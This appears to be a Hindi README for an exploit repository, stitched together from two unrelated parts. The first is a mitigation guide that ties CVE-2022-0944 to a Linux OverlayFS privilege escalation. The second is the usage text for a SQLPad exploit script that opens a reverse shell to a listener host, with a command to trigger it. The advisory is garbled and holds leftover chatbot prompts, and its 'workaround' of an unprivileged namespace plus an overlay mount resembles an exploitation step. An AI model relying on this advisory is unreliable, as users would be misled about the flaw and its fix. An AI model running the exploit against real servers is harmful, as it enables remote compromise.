
शोषण और शमन मार्गदर्शिका CVE-2022-0944 के लिए, OverlayFS में लिनक्स कर्नेल विशेषाधिकार वृद्धि कमजोरी, डिटेक्शन स्क्रिप्ट और पैचिंग निर्देशों के साथ।
लिनक्स कर्नेल के OverlayFS में विशेषाधिकार वृद्धि भेद्यता के लिए सुरक्षा सलाह और शमन मार्गदर्शिका।
CVE-2022-0944 लिनक्स कर्नेल के OverlayFS उपतंत्र में एक सुरक्षा भेद्यता है, जो स्थानीय हमलावरों को विशिष्ट कॉन्फ़िगरेशन में फ़ाइल निर्माण के अनुचित प्रबंधन के माध्यम से विशेषाधिकार बढ़ाने की अनुमति देती है।

🚨 प्रभाव
एक स्थानीय हमलावर निम्न कार्य कर सकता है:
क्राफ्टेड फ़ाइल संचालनों के माध्यम से रूट विशेषाधिकार प्राप्त करना
सुरक्षा प्रतिबंधों को दरकिनार करना
संवेदनशील सिस्टम फ़ाइलों को संशोधित करना
पूरे सिस्टम की अखंडता से समझौता करना
🔍 पहचान
grep CVE-2022-0944 /var/log/apt/history.log
# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ शमन
आधिकारिक पैच
निम्नलिखित पैच किए गए संस्करणों में से किसी एक पर अपडेट करें:
लिनक्स कर्नेल 5.16.12 या बाद का
विक्रेता-विशिष्ट बैकपोर्टेड पैच
अपडेट कमांड:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
कार्य-विकल्प (यदि तुरंत पैचिंग संभव न हो)
OverlayFS उपयोग प्रतिबंधित करें:
sudo modprobe -r overlay
नेमस्पेस प्रतिबंध लागू करें:
# Create unprivileged user namespace
unshare -Ur
# Mount with user restrictions
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor नीतियां लागू करें: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ अस्वीकरण यह दस्तावेज़ केवल सूचनात्मक उद्देश्यों के लिए प्रदान किया गया है। सटीकता सुनिश्चित करने के प्रयास किए गए हैं, फिर भी कोई गारंटी प्रदान नहीं की जाती है। उत्पादन परिनियोजन से पहले हमेशा विकास वातावरण में पैच का परीक्षण करें।
अंतिम अद्यतन: 2023-10-01 | परिवर्तन लॉग देखें
मुख्य विशेषताएं:
यह README प्रारूप इसके लिए उपयुक्त है:
क्या आप चाहेंगे कि मैं:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
उदाहरण:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
इस रिपॉजिटरी में कोड और उपकरण केवल शैक्षिक उद्देश्यों के लिए हैं, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और शिक्षण वातावरण में उपयोग के लिए। इस कोड के लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेते हैं। कोड "जैसा है" बिना किसी वारंटी के प्रदान किया गया है, चाहे वह स्पष्ट हो या निहित, जिसमें व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियां शामिल हैं, लेकिन इन्हीं तक सीमित नहीं है।